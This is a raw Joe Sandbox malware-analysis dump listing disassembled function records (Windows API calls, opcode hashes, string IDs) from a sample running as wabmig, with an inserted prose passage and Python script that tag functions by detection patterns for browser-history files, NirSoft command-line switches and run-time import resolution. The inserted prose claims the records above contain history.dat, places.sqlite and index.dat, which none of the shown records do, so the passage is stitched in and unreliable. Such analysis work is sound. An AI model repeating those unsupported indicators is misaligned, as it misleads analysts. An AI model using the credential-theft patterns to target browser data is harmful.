                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                            • String ID:
                                                                            • API String ID: 1125800050-0
                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleSleep
                                                                            • String ID: }A
                                                                            • API String ID: 252777609-2138825249
                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                            APIs
                                                                            • malloc.MSVCRT ref: 00409A10
                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                            • free.MSVCRT ref: 00409A31
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: freemallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 3056473165-0
                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d
                                                                            • API String ID: 0-2564639436
                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: BINARY
                                                                            • API String ID: 2221118986-907554435
                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /stext
                                                                            • API String ID: 2081463915-3817206916
                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: .Mw
                                                                            • API String ID: 2081463915-2453323595
                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 2445788494-0
                                                                            • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                            • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
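The records above carry the indicators an analyst actually pivots on: the Firefox/IE history file names (history.dat, places.sqlite, index.dat) in the String IDs, the /stext switch that NirSoft tools such as WebBrowserPassView take to dump their report as text, and the GetSystemDirectoryW/LoadLibraryW/GetProcAddress chain that resolves imports at run time. As an added example, not part of the Joe Sandbox report, the Python below parses this per-function record layout (API call lines, subcall attribution, the Similarity fields) and tags each function by those indicators. The sample input is abbreviated from records on this page; the indicator tables and tag names are the example's own assumptions.

```python
import re

# Constructed sample input: three function records in the Joe Sandbox
# "APIs / Strings / Memory Dump Source / Similarity" layout, abbreviated
# from records on this page (long argument lists shortened).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12), ref: 00409B9C
• memset.MSVCRT ref: 00403A55
Strings
Memory Dump Source
• Source File: 00000011.00000002.2456821504.0000000000400000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
Strings
Memory Dump Source
Similarity
• API ID: _wcsicmp
• String ID: /stext
• Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141), ref: 00404476
Memory Dump Source
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID:
• Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
"""

# Indicator tables are this example's own choices, not something the report defines.
BROWSER_ARTIFACTS = {
    "places.sqlite": "Firefox history/bookmarks database",
    "history.dat": "legacy Mozilla (Mork) history file",
    "index.dat": "Internet Explorer cache/history index",
}
NIRSOFT_SWITCHES = {"/stext": "NirSoft 'save report as text' switch"}
DYNAMIC_RESOLVE = {"LoadLibraryW", "GetProcAddress"}   # run-time import resolution
TEMP_STAGING = {"GetTempPathW", "GetTempFileNameW"}     # staging a file under %TEMP%

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9]+)\b.*?\bref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# "• <Key>: <value>" lines from the Memory Dump Source / Similarity sections.
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|"
    r"Instruction Fuzzy Hash|Source File|Snapshot File):\s*(?P<val>.*?)\s*$"
)


def parse_records(text):
    """Split report text into per-function records; a record ends at its
    'Instruction Fuzzy Hash' line, which is the last field Joe Sandbox emits."""
    records, cur = [], {"apis": [], "fields": {}}
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur["apis"].append({"api": m["api"], "module": m["mod"],
                                "ref": m["ref"], "subcall": m["sub"]})  # subcall None = direct call
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = {"apis": [], "fields": {}}
    return records


def assess(record):
    """Return indicator tags for one function record (empty list = nothing notable)."""
    apis = {a["api"] for a in record["apis"]}
    # String ID joins the function's referenced strings with '$'.
    strings = [s for s in record["fields"].get("String ID", "").split("$") if s]
    tags = []
    for s in strings:
        if s.lower() in BROWSER_ARTIFACTS:
            tags.append(f"browser-history-artifact:{s}")
        if s.lower() in NIRSOFT_SWITCHES:
            tags.append(f"nirsoft-cli-switch:{s}")
    if DYNAMIC_RESOLVE <= apis:
        tags.append("dynamic-api-resolution")
    if TEMP_STAGING <= apis:
        tags.append("temp-file-staging")
    return tags


def analyze(text):
    """Map Opcode ID -> tags for every tagged function in the report text."""
    return {r["fields"].get("Opcode ID", "?"): tags
            for r in parse_records(text) if (tags := assess(r))}


if __name__ == "__main__":
    for opcode_id, tags in analyze(SAMPLE_REPORT).items():
        print(opcode_id[:16], ", ".join(tags))
```

The Opcode ID is the key worth keeping from each tagged record: Joe Sandbox derives it from the function's opcodes for its Similarity view, so a tagged ID can be searched for in other reports to find the same routine in other samples of the family. Run the script over a saved report's text to get that list directly.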
                                                                            APIs
                                                                            Strings
                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: malloc
                                                                            • String ID: failed to allocate %u bytes of memory
                                                                            • API String ID: 2803490479-1168259600
                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041BDDF
                                                                            • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmpmemset
                                                                            • String ID:
                                                                            • API String ID: 1065087418-0
                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                            • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                            • String ID:
                                                                            • API String ID: 1381354015-0
                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID:
                                                                            • API String ID: 2221118986-0
                                                                            • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                            • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                            • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                            • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004301AD
                                                                            • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1297977491-0
                                                                            • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                            • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                            • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free
                                                                            • String ID:
                                                                            • API String ID: 1294909896-0
                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                            APIs
                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                              • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Time$CloseCompareCreateHandlememset
                                                                            • String ID:
                                                                            • API String ID: 2154303073-0
                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                            APIs
                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3150196962-0
                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                            APIs
                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 3154509469-0
                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                            APIs
                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                            • String ID:
                                                                            • API String ID: 4232544981-0
                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                            APIs
                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                            APIs
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
